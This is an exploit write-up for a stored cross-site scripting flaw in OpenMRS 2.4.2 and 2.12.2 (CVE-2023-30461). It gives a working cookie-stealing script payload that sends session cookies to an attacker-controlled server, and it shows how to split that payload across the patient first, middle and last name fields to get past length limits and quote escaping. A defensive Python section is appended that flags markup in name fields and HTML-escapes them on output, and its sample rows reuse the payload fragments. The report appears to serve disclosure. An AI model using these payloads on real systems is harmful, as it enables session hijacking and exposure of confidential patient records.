# Exploit Title: OpenMRS XSS Vulnerability in Attachments
# Date: 2023-04-09
# Exploit Author: Omar Tsai
# Vendor Homepage: https://openmrs.org/
# Software Link: https://openmrs.org/download/
# Version: 2.4.2, 2.12.2
# Tested on: OpenMRS 2.4.2, 2.12.2 Standalone
# CVE : CVE-2023-30461
# Proof-of-concept for XSS OpenMRS 2.4.2, 2.12.2
In this example, I will demonstrate a simple cookie-stealing attack using the three name fields of a patient record (First name, Middle name, and Last name).
## 1. Figure out the XSS payload
```html
<script>$.get(`https://<my_server>/?`+document.cookie);</script>
```
Each name field is limited to 50 characters, so the payload has to be split into chunks of at most 50 characters. Note that backticks are used as the string delimiters because quotation marks are escaped in the field.
## 2. Split up the XSS payload into 3 parts
I will split the payload into 3 parts using a variable and the final jQuery request:
**For the first name:**
```html
<script>var a=`https://my-own`</script>
```
**For the middle name:**
```html
<script>a+=`-simpledomain.cp,/?`</script>
```
**For the last name:**
```html
<script>$.get(a+document.cookie);</script>
```
## 3. Save the patient information
Just click Save.
## 4. Execute XSS attack
The XSS attack can be triggered by going to the `attachments` page of the patient.
## 5. Get cookies
If you look back at your server logs, a GET request will have been initiated with the user's cookies.
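
For the defensive side of the behaviour described above, the following is an added example (not part of the original report and not OpenMRS code). It audits exported patient name rows for markup characters and shows the display name HTML-encoded on output. The column names and the sample rows are assumptions constructed for illustration; patient 2 reuses the three fragments from step 2, each of which fits the 50-character limit.

```python
import html
import re

# Characters that never belong in a personal name but are needed to build
# markup or the backtick-quoted strings used in the report above.
SUSPICIOUS = re.compile(r"[<>`]")
NAME_FIELDS = ("given_name", "middle_name", "family_name")  # assumed column names

# Constructed sample rows; patient 2 holds the three fragments from the report.
SAMPLE = [
    {"patient_id": 1, "given_name": "Mary", "middle_name": "", "family_name": "O'Brien"},
    {"patient_id": 2,
     "given_name": "<script>var a=`https://my-own`</script>",
     "middle_name": "<script>a+=`-simpledomain.cp,/?`</script>",
     "family_name": "<script>$.get(a+document.cookie);</script>"},
    {"patient_id": 3, "given_name": "Anne-Marie", "middle_name": None, "family_name": "D'Souza"},
]


def suspicious_fields(record):
    """Return the name fields of one record that contain markup characters."""
    return [f for f in NAME_FIELDS if SUSPICIOUS.search(record.get(f) or "")]


def audit(records):
    """Map patient_id -> flagged fields, for records with at least one hit."""
    hits = {}
    for rec in records:
        flagged = suspicious_fields(rec)
        if flagged:
            hits[rec["patient_id"]] = flagged
    return hits


def render_name(record):
    """Build the display name with every field HTML-encoded on output."""
    parts = [html.escape(record.get(f) or "", quote=True) for f in NAME_FIELDS]
    return " ".join(p for p in parts if p)


if __name__ == "__main__":
    for pid, fields in audit(SAMPLE).items():
        print(f"patient {pid}: markup in {', '.join(fields)}")
    for rec in SAMPLE:
        print(rec["patient_id"], render_name(rec))
```

Names with apostrophes or hyphens pass the audit untouched, while the encoded output for patient 2 is rendered by the browser as literal text rather than as three script blocks.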